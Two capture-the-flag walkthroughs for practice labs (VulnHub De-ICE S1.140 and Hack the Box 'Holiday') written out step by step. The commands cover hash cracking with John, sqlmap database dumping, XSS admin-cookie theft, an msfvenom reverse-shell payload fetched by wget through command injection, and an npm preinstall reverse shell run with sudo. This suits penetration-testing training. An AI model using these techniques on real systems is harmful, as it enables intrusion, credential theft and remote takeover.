Hack the De-ICE: S1.140 (Boot to Root)

Hello friends!! Today we are going to solve De-ICE: S1.140 CTF challenge presented by vulnhub for penetration practice. This lab is proposal for OSCP practice and mode of difficulty level is medium. You can download it from this Link: https://www.vulnhub.com/entry/de-ice-s1140,57/
Penetrating Methodlogies:
§  Network Scaning (Nmap)
§  HTTP Directory brute-force (Dirb)
§  Obtain Auth log
§  HTTPS Directory brute-force (Dirb)
§  Login in phpmyadmin
§  Steal database credential
§  FTP login to get tar file
§  SSH login to get backup.sh
§  Extracting tar file to get shadow file
§  Crack hashes (John the ripper)
§  Sudo privilege escaltion
§  Get secret.jpg

Let’s Begin!!
You will get target VM machine IP at the time of boot-up so let’s start with nmap port enumeration and execute following command in our terminal.
nmap -sV

Since port 80 was opened; so I explored target IP in the web browser and where we need to mark the lines to get the hint. Then at last you will following text shown as in the below image.

Even after reading above hint, I didn’t get any remarkable clue for further step therefore I use dirb for directory brute-force attack on HTTP.
From its result I found so many web directories but /forum and its relative directories looks more interesting to me.

Then we navigate to /forum and observe following web page.

Further we explored /forum/index.php and notice the following web page which was an auth log for ssh login Looking at the log again, I noticed that there was only one successful login, which was from user mbrown. So I copied this log into a text file and named as file.txt

Then with help of following command we try to grep all invalid user entry who tried to login and opened session for ssh.
cat file.txt | grep “Invalid user” | awk ‘{print $8}’
cat file.txt | grep “open”
One of the user names we have grabbed in the file.txt was !DFiuoTkbxtdk0! appeared to be the password for mbrown .

I tried to login into the forum as mbrown with the password I found above, and get successfully logged in and found mbrown’s email address on his profile page as shown:

After that I run dirb on port 443 and notice some exclusive directories such /webmail and /phpmyadmin is also available.

When I explored, I got sqirrelmail login page where I submit MBrown credential for login.
Name: mb@lazyadmin.corp
Password: !DFiuoTkbxtdk0!

In his mailbox I found mysql login information:
username: root
Password: S4!y.dk)j/_d1pKtX1

As we have enumerated that /phpmyadmin is also available so I explore it and submit above found mysql login information.

I successfully logged into database and with little more efforts I found all username and their encrypted password which I copied for decryption.

With help of online MD-5 decryption we got 2 hash values.

So now we have following credential
Rhedley: tum-ti-tum
Swillard: Austin-Willard
Now let’s try to connect with FTP with the following:
I was able to view the contents of the incoming directory which have a file backup_webhost_130111.tar.gz.enc that I downloaded with help of get command.
get backup_webhost_130111.tar.gz.enc

Then I explore more and found .ssh directory where I get ssh key “downloadkey” for user MBrown. I downloaded this also.
get downloadkey

Now let’s try to login into ssh with help of key enumerated above.
ssh -i downloadkey mbrown192.168.1.110
Bravo!! Successfully spawned victim’s machine, then I switch to user: rhedley where I found a script backup.sh which holds the command and password used to encrypt the backup_webhost_130111.tar.gz.enc I downloaded earlier.
su rhedley
cd /opt
cat backup.sh
And found encryption is aes-256-cbc and password 8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1

Now let’s try to decrypt backup_webhost_130111.tar.gz.enc with help of below command:
openssl aes-256-cbc -d -md md5 -in backup_webhost_130111.tar.gz.enc -out file.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
tar -xvf file.tar.gz
Great!! It was a compress file of /etc directory and after extracting this tar file we have owned all valuable files of /etc directory of victim’s machine.

This gave me shadow file and I try to open it with help of cat command.
cd etc
cat shadow
And as you can see, I found hashes of three users, let’s try to crack it. Here I have saved all three entries into a text file and named it cracked.

Then used the following command to crack the hashes of shadow file but fail to crack the hashes for third user: sraines
unshadow passwd shadow > cracked

Then used darkcode.txt wordlist for password cracking and it took so much time to get the password for sraines who is renamed as swillard.
john cracked --wordlist=/root/darkcode.txt
So we got following credential:
User: sraines
Password: brillantissimo

So when I try to login with swillard: brillantissimo (password of sraines), it worked and I successfully login as swillard. Then I check sudo right and found this user has ALL privilege, which means he has root privilege.
su swillard
sudo -l
sudo su
cd /root
Inside /root directory I found an image secret.jpg which I move into web directory.
mv secret.jpg /var/www/forum/templates_c/secret.jpg

So when I explored above path I got the image of a Birthday Cake!! J

Hack the Box: Holiday Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing and black box testing. Holiday is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is so let’s begin with nmap port enumeration.
nmap -A -p- –open
From given below image, you can observe we found port 22 and 8000 are open on target system.

As port 8000 is running http we open the IP address in the browser, and find a webpage.

We don’t find anything on the webpage so we use dirb to enumerate the directories.
dirb http://192.168.102:8000
Dirb scan gives us a link to a directory called /login, we open the link and find a login page.
We capture the login request using burpsuite. We use random credentials as placeholder.
We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.
sqlmap -r sql.txt –dbms=SQLite -T users --columns –dump --batch
We use hashkiller.co.uk to decrypt the hash and find the password to the user.
We login using these credentials and we are redirected to a page with that looks like it contains user information.
We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.
We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.
We post the note to bypass the filter we have to use this payload:
We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.
nc -lvp 80
After waiting for 1 minute we received the admin cookie.
The cookie is url encoded we decode and use it hijack the administrator session.
We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.
As soon as we forward the request, we are able to successfully hijack the administrator session.
We now go to /admin directory and find a page where there are options to export bookings and notes.
We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.
We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost= lport=4444 –f elf > shell
After creating a shell we create a python http server to upload into the target machine.
Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we can bypass the filter.
We upload the shell using wget command into the target machine and save it in /tmp directory.
As soon as we run the command we get a prompt that shell is uploaded.
We give our payload read, write and execute permission using command injection.
Now we setup our listener using metasploit.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run

We run the shell using command injection vulnerability on the target machine.
As soon as we run the shell we get a reverse shell.
We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.
python -c “import pty; pty.spawn(‘/bin/bash’)”
sudo -l
Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.
Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json
ln -s /root/root.txt package.json
We run /usr/bin/npm i * as root user and find the final flag.
After searching through google we find a way to get reverse shell using a package called rimrafall.
We setup rimrafall by following the instructions given on the webpage.
We setup the json file and change the preinstalled script to bash one liner.
We run the command as root user to get privileged shell.
sudo npm i rimrafall --unsafe
We setup the listener as soon as we run the preinstalled shell is getting executed we get a reverse shell.
nc –nvlp 1234
We go to /root directory and find a file called root.txt. We take a look at the content of the file and find the final flag.